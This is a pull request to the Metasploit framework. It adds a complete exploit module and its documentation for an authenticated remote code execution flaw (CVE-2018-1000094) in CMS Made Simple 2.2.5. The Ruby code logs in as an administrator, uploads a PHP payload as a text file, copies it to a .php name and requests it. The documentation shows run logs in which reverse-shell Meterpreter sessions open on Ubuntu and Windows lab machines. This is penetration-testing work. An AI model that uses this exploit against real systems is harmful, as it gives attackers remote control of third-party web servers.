### PR TITLE
Add CMS Made Simple Upload/Rename Authenticated RCE

### DIFF
--- a/documentation/modules/exploit/multi/http/cmsms_upload_rename_rce.md
+++ b/documentation/modules/exploit/multi/http/cmsms_upload_rename_rce.md
@@ -1,0 +1,64 @@
+## Description
+
+CMS Made Simple v2.2.5 allows an authenticated administrator to upload a file and rename it to have a .php extension. The file can then be executed by opening the URL of the file in the /uploads/ directory.
+
+## Vulnerable Application
+
+[CMS Made Simple v2.2.5](http://dev.cmsmadesimple.org/project/files/6)
+
+## Verification Steps
+
+1. `./msfconsole -q`
+2. `use use exploit/multi/http/cmsms_upload_rename_rce`
+3. `set username <username>`
+4. `set password <password>`
+5. `set rhosts <rhost>`
+6. `run`
+
+## Scenarios
+
+### CMS Made Simple v2.2.5 on Ubuntu 18.04 (PHP 7.2.7, Apache 2.4.9)
+
+```
+msf5 > use exploit/multi/http/cmsms_upload_rename_rce
+msf5 exploit(multi/http/cmsms_upload_rename_rce) > set username msfdev
+username => msfdev
+msf5 exploit(multi/http/cmsms_upload_rename_rce) > set password msfdev
+password => msfdev
+msf5 exploit(multi/http/cmsms_upload_rename_rce) > set rhosts 172.22.222.123
+rhosts => 172.22.222.123
+msf5 exploit(multi/http/cmsms_upload_rename_rce) > run
+
+[*] Started reverse TCP handler on 172.22.222.194:4444 
+[*] Sending stage (37775 bytes) to 172.22.222.123
+[*] Meterpreter session 1 opened (172.22.222.194:4444 -> 172.22.222.123:44352) at 2018-07-17 08:41:33 -0500
+
+meterpreter > sysinfo
+Computer    : ubuntu
+OS          : Linux ubuntu 4.15.0-23-generic #25-Ubuntu SMP Wed May 23 18:02:16 UTC 2018 x86_64
+Meterpreter : php/linux
+meterpreter >
+```
+
+### CMS Made Simple v2.2.5 on Windows 10 x64 (PHP 5.6.35, Apache 2.4.33)
+
+```
+msf5 > use exploit/multi/http/cmsms_upload_rename_rce
+msf5 exploit(multi/http/cmsms_upload_rename_rce) > set username msfdev
+username => msfdev
+msf5 exploit(multi/http/cmsms_upload_rename_rce) > set password msfdev
+password => msfdev
+msf5 exploit(multi/http/cmsms_upload_rename_rce) > set rhosts 172.22.222.175
+rhosts => 172.22.222.175
+msf5 exploit(multi/http/cmsms_upload_rename_rce) > run
+
+[*] Started reverse TCP handler on 172.22.222.194:4444 
+[*] Sending stage (37775 bytes) to 172.22.222.175
+[*] Meterpreter session 1 opened (172.22.222.194:4444 -> 172.22.222.175:49829) at 2018-07-17 08:46:27 -0500
+
+meterpreter > sysinfo
+Computer    : WIN10
+OS          : Windows NT WIN10 10.0 build 17134 (Windows 10) AMD64
+Meterpreter : php/windows
+meterpreter >
+```

--- a/modules/exploits/multi/http/cmsms_upload_rename_rce.rb
+++ b/modules/exploits/multi/http/cmsms_upload_rename_rce.rb
@@ -1,0 +1,161 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'CMS Made Simple Authenticated RCE via File Upload/Copy',
+      'Description'     => %q{
+        CMS Made Simple v2.2.5 allows an authenticated administrator to upload a file
+        and rename it to have a .php extension. The file can then be executed by opening
+        the URL of the file in the /uploads/ directory.
+      },
+      'Author' =>
+        [
+          'Mustafa Hasen',  # Vulnerability discovery and EDB PoC
+          'Jacob Robles'    # Metasploit Module
+        ],
+      'License'         => MSF_LICENSE,
+      'References'      =>
+        [
+          [ 'CVE', '2018-1000094' ],
+          [ 'CWE', '434' ],
+          [ 'EDB', '44976' ],
+          [ 'URL', 'http://dev.cmsmadesimple.org/bug/view/11741' ]
+        ],
+      'Privileged'  => false,
+      'Platform'  => [ 'php' ],
+      'Arch'  => ARCH_PHP,
+      'Targets' =>
+        [
+          [ 'Universal', {} ],
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jul 03 2018'))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, "Base cmsms directory path", '/cmsms/']),
+        OptString.new('USERNAME', [ true, "Username to authenticate with", '']),
+        OptString.new('PASSWORD', [ true, "Password to authenticate with", ''])
+      ])
+
+    register_advanced_options ([
+      OptBool.new('ForceExploit',  [false, 'Override check result', false])
+    ])
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'GET'
+    })
+    unless res
+      return Exploit::CheckCode::Unknown
+    end
+
+    if res.body =~ /CMS Made Simple<\/a> version (\d+\.\d+\.\d+)/
+      version = Gem::Version.new($1)
+      vprint_status("#{peer} - CMS Made Simple Version: #{version}")
+      vuln = Gem::Version.new('2.2.5')
+
+      if version == vuln
+        return Exploit::CheckCode::Appears
+      end
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    unless check == Exploit::CheckCode::Appears
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'admin', 'login.php'),
+      'method' => 'POST',
+      'vars_post' => {
+        'username' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD'],
+        'loginsubmit' => 'Submit'
+      }
+    })
+    unless res
+      fail_with(Failure::NotFound, 'A reponse was not received from the remote host')
+    end
+
+    unless res.code == 302 && res.get_cookies && res.headers['Location'] =~ /\/admin\?(.*)?=(.*)/
+      fail_with(Failure::NoAccess, 'Authentication was unsuccessful')
+    end
+    vprint_good("#{peer} - Authentication successful")
+
+    csrf = {$1 => $2}
+    cookies = res.get_cookies
+    filename = rand_text_alpha(10)
+
+    # Generate form data
+    message = Rex::MIME::Message.new
+    message.add_part(csrf[$1], nil, nil, "form-data; name=\"#{$1}\"")
+    message.add_part('FileManager,m1_,upload,0', nil, nil, 'form-data; name="mact"')
+    message.add_part('1', nil, nil, 'form-data; name="disable_buffer"')
+    message.add_part(payload.encoded, nil, nil, "form-data; name=\"m1_files[]\"; filename=\"#{filename}.txt\"")
+    data = message.to_s
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'admin', 'moduleinterface.php'),
+      'method' => 'POST',
+      'data' => data,
+      'ctype' => "multipart/form-data; boundary=#{message.bound}",
+      'cookie' => cookies
+    })
+
+    unless res && res.code == 200
+      fail_with(Failure::UnexpectedReply, 'Failed to upload the text file')
+    end
+    vprint_good("#{peer} - File uploaded #{filename}.txt")
+
+    fileb64 = Rex::Text.encode_base64("#{filename}.txt")
+    data = {
+      'mact' => 'FileManager,m1_,fileaction,0',
+      "m1_fileactioncopy" => "",
+      'm1_selall' => "a:1:{i:0;s:#{fileb64.length}:\"#{fileb64}\";}",
+      'm1_destdir' => '/',
+      'm1_destname' => "#{filename}.php",
+      'm1_path' => '/uploads',
+      'm1_submit' => 'Copy',
+      $1 => $2
+    }
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'admin', 'moduleinterface.php'),
+      'method' => 'POST',
+      'cookie' => cookies,
+      'vars_post' => data
+    })
+
+    unless res
+      fail_with(Failure::NotFound, 'A reponse was not received from the remote host')
+    end
+
+    unless res.code == 302 && res.headers['Location'] =~ /copysuccess/
+      fail_with(Failure::UnexpectedReply, 'Failed to rename the file')
+    end
+    vprint_good("#{peer} - File renamed #{filename}.php")
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'uploads', "#{filename}.php"),
+      'method' => 'GET',
+      'cookie' => cookies
+    })
+  end
+end

--- a/modules/exploits/multi/http/cmsms_upload_rename_rce.rb
+++ b/modules/exploits/multi/http/cmsms_upload_rename_rce.rb
@@ -91,7 +91,7 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     })
     unless res
-      fail_with(Failure::NotFound, 'A reponse was not received from the remote host')
+      fail_with(Failure::NotFound, 'A response was not received from the remote host')
     end
 
     unless res.code == 302 && res.get_cookies && res.headers['Location'] =~ /\/admin\?(.*)?=(.*)/


### PR DESCRIPTION
Module and docs for [CMS Made Simple v2.2.5](http://dev.cmsmadesimple.org/project/files/6) authenticated RCE.
The module was tested on Windows and Ubuntu running CMSMS v2.2.5. Other version may be affected.

## Verification

- [x] `./msfconsole -q`
- [x] `use use exploit/multi/http/cmsms_upload_rename_rce`
- [x] `set username <username>`
- [x] `set password <password>`
- [x] `set rhosts <rhost>`
- [x] `run`